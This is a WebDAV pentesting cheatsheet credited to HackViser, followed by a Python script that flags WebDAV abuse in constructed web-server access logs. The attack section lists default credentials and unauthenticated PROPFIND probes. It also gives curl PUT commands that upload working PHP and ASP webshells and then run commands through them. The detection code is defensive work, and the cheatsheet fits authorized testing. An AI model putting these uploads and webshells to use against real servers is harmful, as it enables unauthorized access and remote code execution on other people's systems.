Pentesting WebDAV
Source of this cheatsheet
HackViser
WebDAV is an extension of HTTP that allows clients to perform remote web content authoring operations. It enables users to collaboratively edit and manage files on remote web servers. WebDAV adds methods like PUT, DELETE, PROPFIND, and others to the standard HTTP methods. Common implementations include Microsoft IIS WebDAV, Apache mod_dav, and various cloud storage solutions. Misconfigurations can lead to file upload vulnerabilities and unauthorized access.
Connect
Using cadaver (WebDAV client)
|
# Connect to WebDAV server
cadaver http://target.com/webdav/
# With authentication
cadaver http://target.com/webdav/
Username: admin
Password: password
# HTTPS connection
cadaver https://target.com/webdav/
# Once connected, use DAV commands:
dav:/webdav/> ls
dav:/webdav/> put localfile.txt
dav:/webdav/> get remotefile.txt
dav:/webdav/> delete file.txt
|
WebDAV Path Discovery
Discover common WebDAV paths and endpoints.
|
# Common paths
/webdav/
/dav/
/WebDAV/
/uploads/
/files/
/_vti_bin/
/sharepoint/
|
Attack vectors
Authentication Bypass
Test for WebDAV authentication bypass vulnerabilities.
|
# Try without credentials
curl -X OPTIONS http://target.com/webdav/
curl -X PROPFIND http://target.com/webdav/
# Try with default credentials
admin:admin
admin:password
webdav:webdav
# Test authentication
curl -X PROPFIND http://target.com/webdav/ -u admin:admin
|
File Upload (PUT Method)
Upload malicious files using the WebDAV PUT method.
|
# Upload PHP webshell
curl -X PUT http://target.com/webdav/shell.php \
  -u username:password \
  -d '<?php system($_GET["cmd"]); ?>'
# Access shell
curl http://target.com/webdav/shell.php?cmd=whoami
# Upload ASP webshell
curl -X PUT http://target.com/webdav/shell.asp \
  -u username:password \
  -d '<%=CreateObject("WScript.Shell").Exec(Request.QueryString("cmd")).StdOut.ReadAll()%>'
# Upload other file types
curl -X PUT http://target.com/webdav/shell.txt \
  -u username:password \
  --data-binary @shell.php
|
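The unauthenticated PROPFIND probes and the PUT uploads above leave a clear trace in the web server's access log. The following is an added example (not part of the HackViser cheatsheet) of detection logic a defender can run over combined-format access log lines: it flags successful PUTs of executable extensions, follow-up requests to those files carrying a `cmd=` parameter, and WebDAV methods that succeeded with no authenticated user. The log lines are constructed for the example.

```python
import re

# Constructed sample access log in Apache/nginx combined format (not real traffic).
SAMPLE_LOG = """\
10.0.0.5 - - [24/Jan/2026:18:03:47 +0000] "OPTIONS /webdav/ HTTP/1.1" 200 0 "-" "curl/8.5.0"
10.0.0.5 - - [24/Jan/2026:18:03:48 +0000] "PROPFIND /webdav/ HTTP/1.1" 401 0 "-" "curl/8.5.0"
10.0.0.5 - admin [24/Jan/2026:18:03:49 +0000] "PROPFIND /webdav/ HTTP/1.1" 207 812 "-" "curl/8.5.0"
10.0.0.5 - admin [24/Jan/2026:18:03:50 +0000] "PUT /webdav/shell.php HTTP/1.1" 201 0 "-" "curl/8.5.0"
10.0.0.5 - - [24/Jan/2026:18:03:51 +0000] "GET /webdav/shell.php?cmd=whoami HTTP/1.1" 200 54 "-" "curl/8.5.0"
10.0.0.9 - alice [24/Jan/2026:18:10:02 +0000] "PUT /webdav/notes.txt HTTP/1.1" 204 0 "-" "cadaver/0.23.3"
"""

# ip, ident, authenticated user, timestamp, request line, status code
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
# Server-side executable extensions that should never be accepted via PUT.
EXEC_EXT = (".php", ".phtml", ".asp", ".aspx", ".jsp")
# WebDAV authoring methods that must not succeed without authentication.
DAV_METHODS = {"PROPFIND", "PROPPATCH", "MKCOL", "COPY", "MOVE",
               "LOCK", "UNLOCK", "PUT", "DELETE"}

def parse_line(line):
    """Return the parsed fields of one log line, or None if it does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None

def find_alerts(log_text):
    """Return (alert_type, source_ip, request_path) tuples for suspicious lines."""
    alerts = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if not rec:
            continue
        path = rec["path"].split("?", 1)[0].lower()   # drop the query string
        method, status = rec["method"], int(rec["status"])
        success = 200 <= status < 300
        if method == "PUT" and path.endswith(EXEC_EXT) and success:
            alerts.append(("exec_upload", rec["ip"], rec["path"]))
        elif method == "GET" and path.endswith(EXEC_EXT) \
                and "cmd=" in rec["path"].lower() and status == 200:
            alerts.append(("webshell_exec", rec["ip"], rec["path"]))
        elif method in DAV_METHODS and rec["user"] == "-" and success:
            alerts.append(("unauth_dav", rec["ip"], rec["path"]))
    return alerts

if __name__ == "__main__":
    for alert in find_alerts(SAMPLE_LOG):
        print(alert)
```

The benign `cadaver` PUT of `notes.txt` by an authenticated user produces no alert; the unauthenticated PROPFIND is ignored because it was rejected with 401.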
Last update: 2026-01-24
Created: January 24, 2026 18:03:47